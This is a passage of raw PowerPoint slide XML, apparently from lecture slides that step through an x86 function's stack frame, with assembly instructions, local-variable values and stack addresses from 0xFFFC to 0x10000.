        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5874101" y="2407962"/>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1205950" y="348972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909812" y="221295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0xFFFC</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="TextBox 14"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3909812" y="25913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0xFFF8</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17" name="TextBox 16"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3909811" y="297156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0xFFF4</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="TextBox 17"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3909810" y="33279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0xFFF0</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19" name="Right Arrow 18"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1202360" y="205159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29942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Frame</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="5" name="Content Placeholder 4"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:ph idx="1"/>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pPr algn="ctr"/>
                      <a:endParaRPr lang="en-US">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pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>0xa</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84</a:t>
            </a:fld>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1953845" y="416179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3910385" y="18801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0x10000</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="11" name="Table 10"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst/>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="556352" y="4872992"/>
          <a:ext cx="3696160" cy="11125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0xFFF0</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10001"/>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0x10000</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6246558" y="1692435"/>
            <a:ext cx="2897442" cy="2308324"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>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sub $0x10,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>%esp</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>movl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> $0xa,-0xc(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movl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> $0x64,-0x8(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$0x41273333,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>%eax</a:t>
            </a:r>
          </a:p>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,-0x4(</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add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p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="Right Arrow 12"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5873526" y="267390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1205950" y="348972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909812" y="221295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0xFFFC</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="TextBox 14"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3909812" y="25913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0xFFF8</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17" name="TextBox 16"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3909811" y="297156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0xFFF4</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="TextBox 17"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3909810" y="33279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0xFFF0</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19" name="Right Arrow 18"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1202360" y="203872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606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Frame</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="5" name="Content Placeholder 4"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:ph idx="1"/>
            <p:extLst/>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pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>0x64</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10002"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="344473">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>0xa</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85</a:t>
            </a:fld>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1953845" y="416179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3910385" y="18801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0x10000</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="11" name="Table 10"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst/>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="556352" y="4872992"/>
          <a:ext cx="3696160" cy="11125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0xFFF0</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10001"/>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0x10000</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6246558" y="1692435"/>
            <a:ext cx="2897442" cy="2308324"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>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sub $0x10,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>%esp</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>movl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> $0xa,-0xc(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movl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> $0x64,-0x8(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$0x41273333,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>%eax</a:t>
            </a:r>
          </a:p>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,-0x4(</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add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p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="Right Arrow 12"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5873526" y="267390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1205950" y="348972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909812" y="221295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0xFFFC</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="TextBox 14"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3909812" y="25913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0xFFF8</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17" name="TextBox 16"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3909811" y="297156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0xFFF4</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="TextBox 17"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3909810" y="33279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0xFFF0</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19" name="Right Arrow 18"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1202360" y="203872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72496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Frame</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="5" name="Content Placeholder 4"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:ph idx="1"/>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pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>0x64</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10002"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="344473">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>0xa</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86</a:t>
            </a:fld>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1953845" y="416179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3910385" y="18801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0x10000</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="11" name="Table 10"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst/>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="556352" y="4872992"/>
          <a:ext cx="3696160" cy="11125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0xFFF0</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10001"/>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0x10000</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6246558" y="1692435"/>
            <a:ext cx="2897442" cy="2308324"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>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sub $0x10,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>%esp</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>movl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> $0xa,-0xc(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movl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> $0x64,-0x8(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$0x41273333,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>%eax</a:t>
            </a:r>
          </a:p>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,-0x4(</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add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p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="Right Arrow 12"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5873526" y="2972222"/>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1205950" y="348972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909812" y="221295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0xFFFC</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="TextBox 14"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3909812" y="25913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0xFFF8</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17" name="TextBox 16"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3909811" y="297156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0xFFF4</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="TextBox 17"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3909810" y="33279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0xFFF0</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19" name="Right Arrow 18"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1202360" y="203872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58949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Frame</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="5" name="Content Placeholder 4"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:ph idx="1"/>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pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>0x64</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10002"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="344473">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>0xa</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87</a:t>
            </a:fld>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1953845" y="416179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3910385" y="18801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0x10000</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="11" name="Table 10"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst/>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="556352" y="4872992"/>
          <a:ext cx="3696160" cy="11125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0x41273333</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10000"/>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0xFFF0</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10001"/>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0x10000</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6246558" y="1692435"/>
            <a:ext cx="2897442" cy="2308324"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>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sub $0x10,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>%esp</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>movl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> $0xa,-0xc(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movl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> $0x64,-0x8(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$0x41273333,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>%eax</a:t>
            </a:r>
          </a:p>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,-0x4(</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add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p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="Right Arrow 12"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5873526" y="2972222"/>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1205950" y="348972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909812" y="221295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0xFFFC</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="TextBox 14"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3909812" y="25913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0xFFF8</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17" name="TextBox 16"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3909811" y="297156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0xFFF4</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="TextBox 17"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3909810" y="33279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0xFFF0</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19" name="Right Arrow 18"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1202360" y="203872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0295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Frame</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="5" name="Content Placeholder 4"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:ph idx="1"/>
            <p:extLst/>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pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>0x64</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10002"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="344473">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>0xa</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88</a:t>
            </a:fld>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1953845" y="416179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3910385" y="18801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0x10000</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="11" name="Table 10"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst/>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="556352" y="4872992"/>
          <a:ext cx="3696160" cy="11125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0x41273333</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10000"/>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0xFFF0</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10001"/>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0x10000</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6246558" y="1692435"/>
            <a:ext cx="2897442" cy="2308324"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>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sub $0x10,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>%esp</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>movl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> $0xa,-0xc(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movl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> $0x64,-0x8(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$0x41273333,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>%eax</a:t>
            </a:r>
          </a:p>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,-0x4(</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add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p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="Right Arrow 12"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5873526" y="323671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1205950" y="348972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909812" y="221295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0xFFFC</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="TextBox 14"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3909812" y="25913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0xFFF8</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17" name="TextBox 16"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3909811" y="297156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0xFFF4</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
